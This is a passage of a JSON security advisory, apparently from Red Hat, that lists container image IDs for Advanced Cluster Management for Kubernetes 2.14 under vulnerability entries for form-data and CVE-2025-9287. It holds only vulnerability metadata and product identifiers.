"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "form-data: Unsafe random function in form-data"
},
{
"cve": "CVE-2025-9287",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-08-20T22:00:53.821394+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
